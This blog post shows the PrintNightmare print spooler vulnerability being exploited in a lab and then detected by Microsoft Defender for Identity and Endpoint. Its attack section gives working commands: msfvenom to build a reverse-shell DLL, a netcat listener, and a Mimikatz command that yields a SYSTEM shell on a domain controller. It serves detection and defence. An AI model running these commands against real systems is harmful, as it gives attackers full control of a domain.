PrintNightmare…from attack to detection via Microsoft Defender for Identity (MDI) and -Endpoint (MDE)

The Print spooler service on domain controller(s) is enabled by default since 2000. Any authenticated user can remotely connect to the print spooler service (owned by SYSTEM) and abuse the service if compromised and get access to the domain controller with ‘nt authority/system’ permissions.

Microsoft Defender for Identity (MCAS) - Identity Security Posture
Microsoft Defender for Identity (source) and Microsoft Cloud App Security (UI) warns (since September 2020) customers that the print spooler should be disabled (vulnerability management) on domain controllers.

The advise is to disable the print spooler service on domain controller(s) and/or disable the group policy setting Allow Print Spooler to accept client connections.

Microsoft Defender for Endpoint (MDE) - Threat and Vulnerability Management (TVM) provides insights in the vulnerability (details) and if there is a public exploit (red threat insights icon in the picture below) available (if MDE is installed on the domain controllers).

Microsoft Defender for Endpoint (MDE) — Threat Analytics (TA) provides in-depth information of the CVE and most important the number of misconfigured / vulnerable devices in the organization (to be remediated).

The attack

Although there are python POC’s available, I’m going to use MimiKatz to exploit the Print Spooler service vulnerability.

1) Create malicious DLL

First we need to create a malicious DLL. I use Kali Linux ( Msfvenom (Msfpayload and Msfencode) to create a ‘malicious’ reverse shell DLL.

msfvenom -a x64 -p windows/x64/shell_reverse_tcp -f dll LHOST= LPORT=4444 -o malicious.dll

2) Set up a Listener

Second we setup a listener (Netcat) on the Kali Linux machine (the windows 10 machine could also be a listener via ncat.exe which is installed with nmap for windows) for the reverse shell and wait…

nc -lvp 4444

3) MimiKatz

Third we use MimiKatz to exploit the vulnerability (RCE & LPE). Create a share and upload the .DLL (\\\share in my example) and execute the latest version 2.2.0 of MimiKatz.

misc::printnightmare /server:WSRV2016-DC01.s3cur1ty.local /authuser:user /authpassword:Passw0rd /library:”\\\share\malicious.dll”

When we run the command-line we get a reverse shell with SYSTEM permissions on the domain controller.


Microsoft Defender for Identity (MDI)

Microsoft Defender for Identity is the Microsoft tool to detect attacks and/or anomalies on the Active Directory like pass-the-hash (authenticate to a remote server via a stolen NTLM hash) for example.

Pro-tip: Active Directory Federation Services (AD FS) is supported since January 2021 after the Solorigate attack . Add a minimum of 2 resolved Domain Controllers for redundancy during setup of the sensor.

Microsoft Defender for Identity version 2.153.14245.64543 detects the PrintNightmare attack on domain controllers. The alert is Suspected Windows Print Spooler service exploration attempts (CVE-2021–34527 exploitation).

Microsoft Defender for Identity alerts are also visible in 1) Microsoft Cloud App Security (Unified SecOps portal) and 2) Microsoft 365 Defender (most detailed information due to enrichment and signal sharing) and (optional) 3) Azure Sentinel.

The Microsoft Defender family (Identity, Endpoint and Office 365) combined in Microsoft 365 Defender as the Microsoft XDR (eXtended Detection and Response) solution, provides a defense in-depth and aggregated/correlated Security solution for the Modern Workplace to quickly detect and (automatic) respond to cross-domain alerts and incidents.

Ps. the Microsoft Security products above are the Technology part of People Process Technology. The People and Process part are as important and require 24x7 threat detection and continues vulnerability management resources and skills to keep the organization safe.

Chief Technology Officer @ Nedscaper